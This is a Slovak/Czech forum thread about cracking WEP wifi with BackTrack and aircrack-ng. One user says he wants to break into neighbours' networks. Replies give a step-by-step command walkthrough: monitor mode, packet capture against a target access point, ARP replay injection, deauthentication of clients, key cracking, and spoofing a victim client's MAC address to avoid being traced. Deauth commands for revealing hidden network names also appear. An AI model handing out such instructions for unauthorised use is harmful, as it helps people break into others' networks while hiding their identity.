prelomenie WEP s backtrackom3
-
Andrew007
Guru wannabe
- Príspevky: 2055
- Registrovaný: 01 jan 2008, 12:20
- Bydlisko: SC:\
- Kontaktovať používateľa:
Keby si aspon nalistoval jednu stranu dozadu...Dark_Mixx napísal:chalani hodi mi do posty niekto linky na najnovsi backtrack?
Ako som si vzdy myslel je to zadara distribucia linuxu na lamanie wifi sieti, ale netusil som, ze niekto chce za nu peniazky...
Poprosim vas budem velmi vdacny.
http://www.remote-exploit.org/backtrack_download.html
-
Andrew007
Guru wannabe
- Príspevky: 2055
- Registrovaný: 01 jan 2008, 12:20
- Bydlisko: SC:\
- Kontaktovať používateľa:
Samozrejme, myslim si ze sa do toho rozumies tak tu mas rovno postuphrban napísal:mňa by len zaujímalo či sa dá zistiť skryté essid a ak áno tak postup ako
Kód: Vybrať všetko
Detekovane AP ma slusny signal, vidite i asociovane klienty ale AP nevysila ESSID.
Použijeme Aireplay prepínač -0 (Deuath). Ten odpojí dle konfigurace příkazu jednoho nebo všechny klienty na AP.
Deauth to broadcast (všesměr)
aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0
Deauth s definovanou MAC klienta.
aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Aireplay-ng zapis:
aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Konzole zobrazí:
Deauth odpoji klienta (-y) asociovaneho na AP a v první konzole (Airodump) se objeví jméno AP (ESSID). Jak to? Klient u asociace na AP ESSID vyšle a Airodump ho zachytí. Pokuď útok funguje je to první prověrka Packet injection (je funkcni). Jako bonus máme jméno AP.
Vysvětlivky:
5 v příkazu znamená počet deauth paketu, ktere odešlete
-0 (nebo taky přepínač nula) je jeden z útoku (Deauth) Aireplay.Zdravim,
kedze mam v mojom okoli vela ludi, kt. maju sifrovanie WEP tak by som chcel cracknut nejaku wifi siet na WIN XP ak by sa to dalo , mam tento adapter http://www.focus.sk/zoom.asp?img=IMAGES ... popis=6209 a neviem k nemu najst nejaky vhodny soft , kt. by s nim spolupracoval.Skuste mi nejako pomoct . Dik
kedze mam v mojom okoli vela ludi, kt. maju sifrovanie WEP tak by som chcel cracknut nejaku wifi siet na WIN XP ak by sa to dalo , mam tento adapter http://www.focus.sk/zoom.asp?img=IMAGES ... popis=6209 a neviem k nemu najst nejaky vhodny soft , kt. by s nim spolupracoval.Skuste mi nejako pomoct . Dik
-
hrban
Addict
- Príspevky: 4950
- Registrovaný: 14 júl 2005, 7:44
- Bydlisko: Almere
- Kontaktovať používateľa:
ak sa rozhodneš pre ubuntu a rozbeháš tam to wifi napíš mi ja ti poradím ako ďalej tiež som stiahol ubuntu 8.10 a s tým robím až doteraz samozrejme už je to tak upravené distro že by ho nik nepoznal 
ráno asi napíšem komplet návod ako sa dá využiť aircrack-ng spolu s wireshark-om
ubuntu a tuším aj backtrack sa dá spustiť aj priamo z cd len to napáliš a nastavíš boot z CD-ROM-ky a môžeš pracovať
ráno asi napíšem komplet návod ako sa dá využiť aircrack-ng spolu s wireshark-om
ubuntu a tuším aj backtrack sa dá spustiť aj priamo z cd len to napáliš a nastavíš boot z CD-ROM-ky a môžeš pracovať
-
hrban
Addict
- Príspevky: 4950
- Registrovaný: 14 júl 2005, 7:44
- Bydlisko: Almere
- Kontaktovať používateľa:
daj konzolu a príkaz
potom si naštuduj toto riaď sa tým je to tam dobre popísné ráno z toho spravím výcuc
Kód: Vybrať všetko
sudo apt-get install aircrack-ngKód: Vybrať všetko
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack-
hrban
Addict
- Príspevky: 4950
- Registrovaný: 14 júl 2005, 7:44
- Bydlisko: Almere
- Kontaktovať používateľa:
čiže najskôr zisti interface name
príkaz
vyhodí ti niečo ako
daľej spusti monitor mode
nemusí tam byť na konci wifi0 malo by tam byť to čo ti oscanovalo tie siete
nabehne niečo takéto
monitor mode máš už spustený na interface mon0 možno u teba sa to bude volať inak
spustíme odchytávanie packetov
niečo takéto
tu sa ti zobrazia aj klienti pripojený na AP resp ich MAC ktorá ti bude treba kvôli tvojej bezpečnosti vyber si jednu z nich a zmeň si ju (zmenu MAC popíšem neskôr)
-c 9 je kanám na ktorom vysiela AP, ktoré chceš cracknúť
--bssid je MAC adresa AP
-w output je názov súboru do ktorého sa ti budú ukladať odchytené pakety
otvor druhé terminálové okno a pusti príkaz
kde
-3 znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 je MAC adresa AP
-h 00:0F:B5:88:AC:82 je MAC adresa nejakého clienta
zobrazí sa niečo takéto
otvor tretie terminálové okno
týmto deautentifikuješ clienta on sa automaticky pripojí a ty tím získaš ARP packet potrebný pre packet injection
ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť v druhom okne)
otvor štvrté okno a už len pusti aircrack a on už urobí všetko za teba
zmena MAC adresy
00:11:22:33:44:55 si daj nejakú z tých klientských MAC adries
príkaz
Kód: Vybrať všetko
sudo iwlist scanKód: Vybrať všetko
ath0 no scan results
eth0 no scan results....
wlan0/wifi0 (u teba asi rausb0)
a názvy sietí s kompletnými info o sieti
kanál na ktorom vysiela a BSSIDKód: Vybrať všetko
sudo airmon-ng start wifi0nabehne niečo takéto
Kód: Vybrať všetko
Interface Chipset Driver
wifi0 Atheros ath5k
ath0 Atheros ath5k (parent: wifi0) (monitor mode enabled on mon0)spustíme odchytávanie packetov
Kód: Vybrať všetko
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0Kód: Vybrať všetko
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 -c 9 je kanám na ktorom vysiela AP, ktoré chceš cracknúť
--bssid je MAC adresa AP
-w output je názov súboru do ktorého sa ti budú ukladať odchytené pakety
otvor druhé terminálové okno a pusti príkaz
Kód: Vybrať všetko
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0-3 znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 je MAC adresa AP
-h 00:0F:B5:88:AC:82 je MAC adresa nejakého clienta
zobrazí sa niečo takéto
Kód: Vybrať všetko
Read 629399 packets (got 0 ARP requests), sent 0 packets...Kód: Vybrať všetko
sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť v druhom okne)
otvor štvrté okno a už len pusti aircrack a on už urobí všetko za teba
Kód: Vybrať všetko
sudo aircrack-ng cesta k súboru output.cab Kód: Vybrať všetko
sudo ifconfig rausb0 down
sudo ifconfig rausb0 hw ether 00:11:22:33:44:55
sudo ifconfig rausb0 upOk, dik ale ty mi pises uz asi rozsireny navod, ja mam nainstalovane Ubuntu a nic viac zatial, spustim terminal a zadam sudo iwlist scan a pise mi interface doesnt support scanning.. co mam este na ubuntu nainstalovat ? a na linuxe neviem rozbehat internet, nie wifi ale klasickku kablovku... diky za kazdu radu 
btw:backtrack mam stiahnuty aj napaleny na cd.. mam ho vlozit do mechaniky restartnut a dat tei prikazy co pises ?
btw:backtrack mam stiahnuty aj napaleny na cd.. mam ho vlozit do mechaniky restartnut a dat tei prikazy co pises ?